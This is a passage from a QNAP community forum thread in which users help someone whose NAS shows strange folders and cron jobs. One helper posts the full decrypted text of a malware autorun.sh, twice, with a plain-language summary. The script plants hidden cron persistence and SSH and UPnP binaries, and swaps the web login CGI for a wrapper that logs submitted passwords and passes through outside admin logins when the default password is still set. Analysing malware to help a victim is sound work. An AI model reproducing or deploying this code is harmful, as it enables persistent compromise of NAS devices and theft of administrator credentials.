Re: Strange folders and cronjobs
Posted: Fri Sep 07, 2018 10:27 pm
8TB external drives are cheap..should be plenty of space for movies
not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
No QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.benzo83 wrote:Can i safetely remove these files? Can any QNAP'S employee answer me?
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
Thank you.Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin" command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; } test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; } command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\ \['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\ //I;s/\(^\|\ \)\[[^\ ]\+\]\ .*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; } bdir= test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done; test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1` test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done; test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; } arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm` upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR") cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB") sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT") sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb") sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox") sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH") archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn") archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr") ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB") crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY") arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"` test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || { mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } __BOOT_DEV= __model=`getcfg System "Internal Model"` CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf` CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf` CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf` __BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); } test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6" test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; } for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; } test "$noex" = 1 || { rm "${bdir}/.BOOT_TIME" rm .BOOT_TIME test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}" tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"` test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done; test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd` cp "${arch}" ${tdir} cd ${tdir} tar -xzf "${arch}" grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; } EOF test "$fgrep" || fgrep=grep test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}" test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}" test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; } cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; } chmod 755 "${bdir}/.${ipath}/${crons}.sh" if [ -f "${confdir}/crontab" ]; then test "$RANDOM" || RANDOM=12499 test $(( $RANDOM & 1 )) = 0 && space=' ' || space='' cronmins="$(( $RANDOM % 4 ))" test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" $fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; } fi for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done chmod 755 "${bdir}/.${ipath}/${sshbin}" chmod 755 "${bdir}/.${ipath}/${upnpbin}" grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && { ! test -d "${bdir}/.log" && mkdir "${bdir}/.log" ! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh POSTDATA="" test "x${REQUEST_METHOD}" = xPOST && { case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac; $REMOTE_ADDR:$POSTDATA EOF } test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && { case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0 } if ! test -z "$POSTDATA"; then exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc $POSTDATA V4KLDmYwvc else exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi fi exit 0' > /home/httpd/cgi-bin/_authLogin.cgi test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi } . "${bdir}/.${ipath}/${crons}.sh" cd "${sdir}" rm -rf "${tdir}" test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } true; } #]
Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
Hi MouseTick,Mousetick wrote:This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
